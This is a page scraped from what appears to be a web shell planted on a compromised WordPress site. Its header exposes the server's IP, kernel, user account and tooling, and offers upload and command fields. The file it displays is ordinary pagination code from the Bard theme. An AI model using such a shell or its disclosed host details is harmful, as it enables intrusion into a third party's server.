Done ! 403WebShell
403Webshell
Server IP : 54.36.91.62  /  Your IP : 216.73.216.38
Web Server : Apache
System : Linux webm008.cluster127.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : awaywithxm ( 25098)
PHP Version : 7.0.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/awaywithxm/www/wp-content/themes/bard/templates/grid/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/awaywithxm/www/wp-content/themes/bard/templates/grid/blog-pagination.php
<?php 

global $paged;
global $wp_query;
$pages = $wp_query->max_num_pages;
$range = 2;
$showitems = ( $range * 2 ) + 1;
$post_pagination = bard_options( 'blog_page_post_pagination' );

if ( empty( $paged ) ) {
	$pagedd = 1;
} else {
	$pagedd = $paged;
}

if ( ! $pages ) {
	$pages = 1;
}

if ( $pages == 1 ) {
	return;
}

// Check for WooCommerce
if ( class_exists( 'WooCommerce' ) ) {
	if ( is_shop() ) {
		$post_pagination = 'numeric';
	}
}

?>

<nav class="blog-pagination clear-fix <?php echo esc_attr( $post_pagination ); ?>" data-max-pages="<?php echo esc_attr( $wp_query->max_num_pages ); ?>" data-loading="<?php esc_attr_e( 'Loading...', 'bard' ); ?>" >

<?php

// Numeric Pagination
if ( $post_pagination === 'numeric' ) {

	//  Previous Page
	if ( $pagedd > 1 ) {
		echo '<a href="'. esc_url( get_pagenum_link( $pagedd - 1 ) ) .'" class="numeric-prev-page" ><i class="fas fa-long-arrow-alt-left"></i></a>';
	}
	
	// Pagination
	for ( $i = 1; $i <= $pages; $i++ ) {
		if ( 1 != $pages &&( !( $i >= $pagedd + $range + 1 || $i <= $pagedd - $range - 1 ) || $pages <= $showitems ) ) {
			if ( $pagedd == $i ) {
				echo '<span class="numeric-current-page">'. esc_html( $i ) .'</span>';
			} else {
				echo '<a href="'. esc_url( get_pagenum_link( $i ) ). '">'. esc_html( $i ) .'</a>';
			}
		}
	}

	// Next Page
	if ( $pagedd < $pages ) {
		echo '<a href="'. esc_url( get_pagenum_link( $pagedd + 1 ) ).'" class="numeric-next-page" ><i class="fas fa-long-arrow-alt-right"></i></a>';
	}

// Default Pagination
} elseif ( $post_pagination === 'default' ) {

	if ( get_next_posts_link() ) {
		echo '<div class="previous-page">';
			next_posts_link( '<i class="fas fa-long-arrow-alt-left"></i>&nbsp;'.esc_html__( 'Older Posts', 'bard' ) );
		echo '</div>';
	}
	
	if ( get_previous_posts_link() ) {
		echo '<div class="next-page">';
			previous_posts_link( esc_html__( 'Newer Posts', 'bard' ).'&nbsp;<i class="fas fa-long-arrow-alt-right"></i>' );
		echo '</div>';
	}

// Load More / Infinite Scroll
} else {
	next_posts_link( esc_html__( 'Load More', 'bard' ) );
}

?>

</nav>

Youez - 2016 - github.com/yon3zu
LinuXploit